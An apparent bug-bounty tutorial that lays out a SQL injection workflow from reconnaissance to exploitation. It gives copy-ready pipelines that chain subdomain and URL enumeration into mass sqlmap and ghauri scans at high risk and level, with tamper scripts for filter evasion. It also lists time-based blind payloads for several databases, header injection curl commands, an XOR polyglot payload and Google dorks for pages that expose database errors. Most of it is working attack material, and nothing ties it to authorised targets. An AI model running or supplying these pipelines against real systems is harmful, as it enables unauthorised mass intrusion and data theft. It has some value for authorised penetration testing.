SQL Injection — Recon to Exploitation
A practical step-by-step SQL injection reconnaissance methodology using subdomain enumeration, URL discovery, mass testing and time-based payloads across multiple databases
9 Phases5+ DBMSCopy Ready
Introduction
SQL Injection remains one of the most critical web vulnerabilities, allowing attackers to manipulate backend databases through unsanitized inputs. Effective reconnaissance is key to identifying potential SQLi points before exploitation. This article walks you through a practical, step-by-step SQLi reconnaissance methodology using popular tools and payloads.
Step 1
Recon the Target Subdomains
Before testing for SQLi you need to discover the attack surface — the subdomains and URLs that might be vulnerable.
Single Domain
1Enumerate subdomains and filter dynamic pages
subfinder -d example.com -all -silent | httpx-toolkit -td -sc -silent | grep -Ei 'asp|php|jsp|jspx|aspx'Multiple Domains from a File
2Bulk subdomain enumeration from a file
subfinder -dL subdomains.txt -all -silent | httpx-toolkit -td -sc -silent | grep -Ei 'asp|php|jsp|jspx|aspx'
Step 2
Discovering Potential SQL Injection Endpoints
To find URLs with parameters (common SQLi entry points) use:
Using GAU
3Gather parameterized URLs with GAU
echo https://example.com | gau | uro | grep -E ".php|.asp|.aspx|.jspx|.jsp" | grep "=" >urls.txtUsing Katana (deeper crawl)
4Deep crawl with Katana for more URLs
echo https://example.com | katana -d 5 -ps -pss waybackarchive,commoncrawl,alienvault -f qurl | uro | grep -E ".php|.asp|.aspx|.jspx|.jsp" >urls2.txt
Step 3
Identify SQL-Prone URLs
Use gf to extract endpoints with potential SQL injection points and clean them up:
5Extract SQLi-prone URLs using gf patterns
cat urls1.txt urls2.txt | gf sqli | uro > cleaned-sql.txtTool
Automate Mass SQL Injection Testing
Once you have a list of URLs, automate testing with tools like ghauri or sqlmap:
6Mass SQLi testing with ghauri
ghauri -m cleaned-sql.txt --batch --dbs --level 3 --confirm7Mass SQLi testing with sqlmap
sqlmap -m cleaned-sql.txt --batch --random-agent --tamper=space2comment --level=5 --risk=3 --drop-set-cookie --threads 10 --dbsUsing ghauri
Full Automation Pipeline
Combine subdomain discovery, URL gathering, filtering and automated scanning:
8Full automation pipeline with ghauri
subfinder -d example.com -all -silent | gau --threads 50 | uro | gf sqli > sql.txt; ghauri -m sql.txt --batch --dbs --level 3 --confirm
SQLMap Automation Pipeline
9Full automation pipeline with sqlmap
subfinder -d example.com -all -silent | gau | urldedupe | gf sqli > sql.txt; sqlmap -m sql.txt --batch --dbs --risk 2 --level 5 --random-agentDB
Time-Based Blind SQL Injection Payloads
Time delays are effective for blind SQLi detection when no error messages are shown. Here are payloads for manual testing for different databases:
MySQL
10Basic MySQL time-based delay
SELECT SLEEP(10);11Inline injection with logic
0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z12Benchmark-based delay
1 AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT(FLOOR(RAND()*2),(SELECT SLEEP(5))) AS x FROM information_schema.tables GROUP BY x) y);13Boolean logic delay
' OR IF(1=1, SLEEP(10), 0)-- -PostgreSQL
14Standard PostgreSQL time-based delay
SELECT pg_sleep(10);15Conditional delay with string concatenation
' OR (CASE WHEN ((CLOCK_TIMESTAMP() - NOW()) < interval '0:0:10') THEN (SELECT '1' || pg_sleep(10)) ELSE '0' END)='116Concise PostgreSQL delay
' OR 1=1; SELECT pg_sleep(5);--17Variable delay with random()
' OR (SELECT CASE WHEN (random() < 0.5) THEN pg_sleep(5) ELSE pg_sleep(0) END);--Microsoft SQL Server
18Basic MSSQL delay
WAITFOR DELAY '00:00:10';19Inline SQLi payload
'; WAITFOR DELAY '00:00:05'; --20Conditional delay
IF (1=1) WAITFOR DELAY '0:0:10';21IF EXISTS delay
'; IF EXISTS (SELECT * FROM users) WAITFOR DELAY '00:00:07';--Oracle
22Basic Oracle time delay
BEGIN DBMS_PIPE.RECEIVE_MESSAGE('a',10); END;23Oracle SQLi inline payload
' OR 1=1; BEGIN DBMS_PIPE.RECEIVE_MESSAGE('a',10); END;--24Conditional Oracle delay
DECLARE v INTEGER; BEGIN IF 1=1 THEN DBMS_PIPE.RECEIVE_MESSAGE('a',10); END IF; END;Header
Header-Based SQLi Testing
Some endpoints reflect headers like User-Agent, Referer or X-Forwarded-For. Inject payloads there:
Example Payloads
HTTP Headers
User-Agent: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
Referer: '+(select*from(select(if(1=1,sleep(20),false)))a)+'"Testing with Curl
25Test User-Agent header SQLi
time curl -s -H "User-Agent: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z" "https://target.com/vulnerable-endpoint"26Test X-Forwarded-For header SQLi
time curl -s -H "X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z" "https://target.com/vulnerable-endpoint"27Test Referer header SQLi
time curl -s -H "Referer: '+(select*from(select(if(1=1,sleep(20),false)))a)+'\"" "https://target.com/vulnerable-endpoint"XOR
Mastering XOR-Based SQL Injection Techniques
Explore how XOR logic in SQL payloads like if(now()=sysdate(),sleep(10),0) can be weaponized for bypassing filters and triggering precise time-based detection.
XOR Polyglot Payload
SQL
if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"*/Test with Curl
28Test XOR polyglot payload via curl
time curl "https://target.com/page.php?id=if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"*/"
If the server takes approximately 10 seconds to respond, it strongly indicates a time-based SQL injection vulnerability.
You can also download a full list of advanced XOR-based SQL injection payloads and for other DBMS from my GitHub repository here:
coffinxp/loxs — SQLi PayloadsDork
Advanced Google Dorking for SQL Injection Recon
Google dorks can help find potentially vulnerable pages. Use the following Google dorks to identify endpoints, parameterized URLs and database error-prone pages that could indicate SQL injection potential.
Find URLs with Query Parameters
Google Dorks
site:*.domain.com inurl:id=
site:*.domain.com inurl=product.php?id=
site:*.domain.com inurl=view.php?page=
site:*.domain.com inurl=item.php?cat=By File Extension
Google Dorks
site:*.domain.com ext:php
site:*.domain.com ext:asp
site:*.domain.com ext:aspx
site:*.domain.com ext:jsp
site:*.domain.com ext:jspx
site:*.domain.com ext:cfm
site:*.domain.com ext:plCombine Extension + Parameters
Google Dorks
site:*.domain.com ext:php inurl:id=
site:*.domain.com ext:aspx inurl=productid=
site:*.domain.com ext:jsp inurl=categoryid=Error-Based Fingerprinting
MySQL Errors
# MySQL Errors
site:*.domain.com intext:"You have an error in your SQL syntax"
site:*.domain.com intext:"mysql_fetch_array() expects parameter"
site:*.domain.com intext:"mysql_num_rows() expects parameter"
site:*.domain.com intext:"supplied argument is not a valid MySQL result resource"
site:*.domain.com intext:"Warning: mysql_"
site:*.domain.com intext:"Fatal error: Uncaught mysqli_sql_exception"
# MariaDB / PDO Errors
site:*.domain.com intext:"Fatal error: Call to undefined function mysql_connect()"
site:*.domain.com intext:"Warning: PDO::query()"
site:*.domain.com intext:"SQLSTATE[HY000]"
# PostgreSQL Errors
site:*.domain.com intext:"pg_query(): Query failed"
site:*.domain.com intext:"Warning: pg_connect()"
site:*.domain.com intext:"PostgreSQL query failed: ERROR"
# Microsoft SQL Server Errors
site:*.domain.com intext:"Microsoft OLE DB Provider for SQL Server"
site:*.domain.com intext:"Unclosed quotation mark after the character string"
site:*.domain.com intext:"ADODB.Field error"
site:*.domain.com intext:"80040e14"
# Oracle DB Errors
site:*.domain.com intext:"ORA-00933: SQL command not properly ended"
site:*.domain.com intext:"ORA-01756: quoted string not properly terminated"
site:*.domain.com intext:"Warning: oci_parse()"
# DB2 / Informix / Misc
site:*.domain.com intext:"DB2 SQL error:"
site:*.domain.com intext:"Syntax error in string in query expression"
site:*.domain.com intext:"Error Executing Database Query"
# Generic SQL Error Patterns
site:*.domain.com intext:"Query failed:"
site:*.domain.com intext:"unexpected end of SQL command"
site:*.domain.com intext:"invalid SQL statement"
site:*.domain.com intext:"JDBC Exception"Google Dork Automation
You can automate these dorks using my custom dorking script to quickly discover more SQL injection points. I've also written an article covering some advanced techniques including Google Dorking Automation.
coffinxp/scripts — dorking.pyUsing Loxs Tool
You can also test time-based payloads for all types of DBMS using our Loxs tool, which is specially designed to detect time-based SQL injection vulnerabilities effectively.
coffinxp/loxsVideo Walkthroughs
SQLi Recon Methodology
https://www.youtube.com/watch?v=HD9201YJTfQ
Advanced SQLi Techniques
https://www.youtube.com/watch?v=x1z4GxDtEo0
Time-Based SQLi Deep Dive
https://www.youtube.com/watch?v=KhVMSTYgMxc&t=367s
XOR Polyglot Payloads
https://www.youtube.com/watch?v=Eu1_LbUzdR0
Tips
- Test both GET and POST requests.
- Try tamper scripts like space2comment, between, or charencode with sqlmap.
- Mix payloads into JSON bodies, XML, headers and cookies.
- Monitor 5xx errors, long delays, and unusual behavior — even without data extraction.
- Use a proxy like Burp to see responses in real-time.
Conclusion
SQL Injection reconnaissance is a multi-step process involving subdomain enumeration, URL discovery, mass testing and payload injection. Using the right tools and payloads tailored for different databases increases your chances of finding vulnerabilities efficiently.
Tools